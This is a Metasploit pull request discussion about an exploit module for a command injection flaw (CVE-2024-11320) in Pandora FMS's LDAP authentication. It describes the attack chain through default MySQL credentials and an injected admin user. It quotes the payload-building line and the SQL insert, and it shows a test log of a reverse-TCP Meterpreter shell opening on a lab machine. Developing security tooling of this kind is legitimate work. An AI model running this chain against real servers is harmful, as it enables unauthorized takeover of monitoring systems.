Pandora FMS preauth RCE [CVE-2024-11320]
rapid7/metasploit-framework pull request #19738
Opened 2024-12-16 16:32 UTC by h00die-gr3y

Pandora FMS is a monitoring solution that provides full observability for your organization's technology. 
This module exploits an command injection vulnerability (CVE-2024-11320) in the LDAP authentication mechanism  of Pandora FMS.
You need have admin access at the Pandora FMS Web application in order to execute this RCE.
This access can be achieved leveraging a default password weakness in Pandora FMS that allows an attacker to access the Pandora FMS MySQL database, create a new admin user and gain administrative access to the Pandora FMS Web application. 
The attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world.
This issue affects Pandora FMS Community, Free and Enterprise edition: from `700` through <= `777.4`

2024-12-17 06:46 UTC, Chocapikk commented
Hi @h00die-gr3y, I noticed that both the file name and the module title mention `preauth`, but the exploitation clearly requires admin credentials or access to the MySQL database to create an admin user. Since this isn't a true pre-authentication exploit, it might be misleading. Would it be possible to update the file name, module title, and description to reflect this correctly as a post-auth requirement?

2024-12-17 07:50 UTC, Chocapikk commented on modules/exploits/linux/http/pandora_fms_preauth_rce_cve_2024_11320.rb
> +    end
```suggestion
    payload = "';#{target['Type'] == :php_cmd ? "php -r'#{cmd.gsub(/'/, '"')}'" : cmd} #"
```

2024-12-18 08:35 UTC, h00die-gr3y commented
> Hi @h00die-gr3y, I noticed that both the file name and the module title mention `preauth`, but the exploitation clearly requires admin credentials or access to the MySQL database to create an admin user. Since this isn't a true pre-authentication exploit, it might be misleading. Would it be possible to update the file name, module title, and description to reflect this correctly as a post-auth requirement?

Done. See https://github.com/rapid7/metasploit-framework/pull/19738/commits/2abde4c923dd043d5f4496af4d67d09f4dd449d2.

2024-12-18 08:36 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_preauth_rce_cve_2024_11320.rb
> +    return false unless res&.code == 200
Done. See https://github.com/rapid7/metasploit-framework/pull/19738/commits/2fe0b35384d7b31a91a5167b0ea45cedf91725c5.

2024-12-18 08:37 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_preauth_rce_cve_2024_11320.rb
> +    return false unless res&.code == 200
Done. https://github.com/rapid7/metasploit-framework/pull/19738/commits/2fe0b35384d7b31a91a5167b0ea45cedf91725c5.

2024-12-18 08:37 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_preauth_rce_cve_2024_11320.rb
> +    return false if csrf_code.nil? || csrf_code.blank?
This change did not work. Left original code in. See https://github.com/rapid7/metasploit-framework/pull/19738/commits/2fe0b35384d7b31a91a5167b0ea45cedf91725c5.

2024-12-18 08:38 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_preauth_rce_cve_2024_11320.rb
> +    return false if csrf_code.nil? || csrf_code.blank?
This change did not work. Left original code in. See https://github.com/rapid7/metasploit-framework/commit/2fe0b35384d7b31a91a5167b0ea45cedf91725c5.

2024-12-18 11:07 UTC, msutovsky-r7 reviewed
Thanks @h00die-gr3y, I have submitted few comments to the code, the exploit is functional though. Also, can you please submit documentation for the module?

2024-12-19 15:09 UTC, bwatters-r7 commented on modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
> +    # check if we can login at the Pandora Web application with the default admin credentials
It seems unnecessarily noisy to try default creds every time this gets run?  Maybe hide this behind an option?  Or is this almost always left as default?

2024-12-20 20:42 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
> +    end
Done. See https://github.com/rapid7/metasploit-framework/pull/19738/commits/cf5b26dd6199ec9b669da0564c63784209052e03.

2024-12-20 20:42 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
> +      return false
Done. See https://github.com/rapid7/metasploit-framework/pull/19738/commits/cf5b26dd6199ec9b669da0564c63784209052e03.

2024-12-20 20:43 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
> +      return false
Done. See https://github.com/rapid7/metasploit-framework/pull/19738/commits/cf5b26dd6199ec9b669da0564c63784209052e03.

2024-12-20 20:55 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
> +        'csrf_code' => csrf_code.attribute_nodes[3]
`csrf_code_html = html.at('input[@id="hidden-csrf_code"]')` will return `nil` if this code is not found.
The next test will ensure that we do not get a "undefined method error"
 `csrf_code = csrf_code_html.attribute_nodes[3] unless csrf_code_html.nil? || csrf_code_html.blank?`

If for what ever reason the `attributes_nodes[3]` does not exist, it will return `nil` which is fine.

2024-12-20 21:08 UTC, h00die-gr3y commented
Dear Reviewers,
The second release was tested against most of the Pandora FMS versions. 
It triggered quite some changes where password hashing algorithms were changed  from plain `MD5`  to `BCRYPT` in later versions of Pandora FMS. Also `csrf_hidden-codes` were not used in older versions which now has been catered for.

Finally, the command injection vulnerability (https://github.com/advisories/GHSA-882x-5jhv-r9x4) in the LDAP authentication mechanism of Pandora FMS did not work for versions lower then `v7.0NG.718`, so the vulnerability test has been adapted to handle this.

Documentation will be provided over the weekend.

2024-12-24 16:02 UTC, msutovsky-r7 requested changes

2024-12-24 18:20 UTC, h00die-gr3y commented on modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
> +      mysql_query_res = mysql_query("INSERT INTO tusuario (id_user, password, is_admin) VALUES (\'#{@username}\', \'#{password_hash}\', '1');")
@msutovsky-r7 , I do not understand your comment.
What is your concern?

2025-01-03 11:42 UTC, msutovsky-r7 commented on modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
> +      mysql_query_res = mysql_query("INSERT INTO tusuario (id_user, password, is_admin) VALUES (\'#{@username}\', \'#{password_hash}\', '1');")
Hi @h00die-gr3y, my bad, I wrote that comment bit unclearly. What I was saying is that SQL query does not seem be sanitized, so if somehow a `'` is propagated into that variable, it will cause exploit to fail. However, after some further discussion, it's not something that need to be fixed, from my side it's now only suggestion to keep the code clean, however, it's not blocking this PR, so I'll resolve this comment and it can be left as it is.

2025-01-09 12:51 UTC, dledda-r7 approved these changes
Looks  good to me.

```
msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > exploit
[*] Started reverse TCP handler on 172.23.158.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora FMS version v7.0NG.772
[*] Trying to log in with admin credentials admin:pandora at the Pandora FMS Web application.
[*] Succesfully authenticated at the Pandora FMS Web application.
[*] Saving admin credentials at the msf database.
[*] Executing PHP Command for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 172.23.148.81
[*] Meterpreter session 2 opened (172.23.158.111:4444 -> 172.23.148.81:34034) at 2025-01-09 05:24:06 -0500
[+] Payload is successful removed from LDAP configuration.

meterpreter > sysinfo
Computer    : vm-ubuntu2204
OS          : Linux vm-ubuntu2204 6.8.0-51-generic #52~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Dec  9 15:00:52 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter > 
```

2025-01-09 14:16 UTC, msutovsky-r7 approved these changes
Looks good to me

2025-01-09 16:16 UTC, merged

2025-01-09 16:19 UTC, dledda-r7 commented
# Release Notes
This adds an exploit module for Pandora FMS having a command injection vulnerability ([CVE-2024-11320](https://github.com/advisories/GHSA-882x-5jhv-r9x4)) in the LDAP authentication mechanism.